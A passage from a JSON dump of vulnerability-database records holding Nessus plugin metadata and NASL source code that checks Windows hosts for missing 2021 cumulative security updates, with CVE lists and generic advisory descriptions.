audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007245, 5007260])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:38", "description": "The Windows installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.\n \n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services.\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information.", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007207: Windows 10 LTS 1507 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007207.NASL", "href": "https://www.tenable.com/plugins/nessus/154987", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154987);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSFT\", value:\"MS21-5007207\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007207: Windows 10 LTS 1507 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands.\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component\n to deny system or application services.\n\n - An information disclosure vulnerability. 
An attacker can exploit this to disclose potentially sensitive\n information.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5007207\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-11';\nkbs = make_list(\n '5007207'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007207])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:13:08", "description": "The remote Windows host is missing security update 5007255 or cumulative update 5007247. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-42284)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007255: Windows 8.1 and Windows Server 2012 R2 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2023-09-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007255.NASL", "href": "https://www.tenable.com/plugins/nessus/154996", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154996);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/22\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007255\");\n script_xref(name:\"MSKB\", value:\"5007247\");\n script_xref(name:\"MSFT\", value:\"MS21-5007255\");\n script_xref(name:\"MSFT\", value:\"MS21-5007247\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007255: Windows 8.1 and Windows Server 2012 R2 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007255\nor cumulative update 5007247. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-42284)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370,\n CVE-2021-41377, CVE-2021-41379, CVE-2021-42278,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007255\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007247\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007255 or Cumulative Update 5007247.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007255', '5007247');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007255, 5007247])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005094 or cumulative update 5005099. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. 
An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005094: Windows Server 2012 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005094.NASL", "href": "https://www.tenable.com/plugins/nessus/152421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152421);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005094\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005099\");\n script_xref(name:\"MSFT\", value:\"MS21-5005094\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005099\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005094: Windows Server 2012 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005094\nor cumulative update 5005099. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. 
An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005094-security-only-update-276b95ad-c923-454c-8758-5b90175d86cc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed9c2c14\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005099-monthly-rollup-34a20feb-f899-4d10-91e0-d5ab32c4e009\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9af3c64c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005094 or Cumulative Update KB5005099.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", 
value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005099',\n '5005094'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005099, 
5005094])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:18", "description": "The remote Windows host is missing security update 5005040.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. 
An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005040: Windows 10 version 1507 LTS Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005040.NASL", "href": "https://www.tenable.com/plugins/nessus/152422", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152422);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005040\");\n script_xref(name:\"MSFT\", value:\"MS21-5005040\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005040: Windows 10 version 1507 LTS Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005040.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005040-os-build-10240-19022-e8bbfa7a-1012-4e18-a2d7-8ae6a8acf8fb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cab780fc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005040.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 
